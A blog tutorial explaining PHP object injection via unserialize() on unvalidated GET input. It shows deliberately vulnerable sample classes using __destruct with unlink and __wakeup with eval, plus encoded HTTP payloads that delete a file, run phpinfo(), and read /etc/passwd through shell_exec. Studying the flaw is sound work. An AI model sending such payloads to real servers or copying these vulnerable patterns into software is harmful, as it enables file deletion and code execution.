July 27, 2016
comment 0

Unserialize PHP Exploit Samples


Unserialize PHP exploit is a kind of PHP Object injection. This exploit will occur when a user defined input is not being sanitized properly before being passed to unseriliaze function.

For this exploit to work, you need to take advantage of PHP’s magic methods like __destruct or __wakeup.

See examples below:

For example you have this class named Sample1 with a __desctruct method in it.

class Sample1 {
     private $file;
     public function __construct() {
         // SOME PHP CODES HERE
     }

     public function __destruct() {
         $file = '/tmp/'.$this->file;
         if(file_exists($file)) {
              return unlink($file);
         }
     }
}

// SOME PHP CODE HERE
unserialize($_GET['data']);

As you can see on the example above, the code unserialize’s $_GET['data'] which is a user defined input without any validation. Attacker might be able to delete file using Path Traversal attack.

All we need to do here is set a malicious string on the data parameter to make this exploit work. See malicious payload below.


GET /Sample1.php?data=O%3A8%3A%22Sample1%22%3A1%3A%7Bs%3A14%3A%22%00Sample1%00file%22%3Bs%3A8%3A%22test.txt%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

This particular payload will set Sample1’s $file to test.txt and then trigger the __destruct method which then proceeds to delete test.txt on /tmp directory.

Now check our second example with __wakeup magic method.

class Sample2 {
    private $cmd;
    public function __construct() {
        // SOME PHP CODE
    }

    public function __wakeup() {
        if($this->cmd) {
            eval($this->cmd);
        }
    }
}

// SOME PHP CODE
unserialize($_GET['data']);

In this example, attacker might be able to execute PHP commands by sending a malicious payload. Check payload below.


GET /Sample2.php?data=O%3A7%3A%22Sample2%22%3A1%3A%7Bs%3A12%3A%22%00Sample2%00cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

This particular payload will simply execute phpinfo();. But with a little tweak on our payload, we can basically do almost everything on their server. Check sample payload below which will display the content of /etc/passwd file.

GET /Sample2.php?data=O%3A7%3A"Sample2"%3A1%3A%7Bs%3A12%3A"%00Sample2%00cmd"%3Bs%3A36%3A"print+shell_exec%28%27cat+%2Fetc%2Fpasswd%27%29%3B"%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

Basically, with this flaw, the attacker can play GOD Mode on the victims Application. That’s how serious this vulnerability is.

This vulnerability is available on PHP 5.3 and higher.


Leave a Reply

Your email address will not be published. Required fields are marked *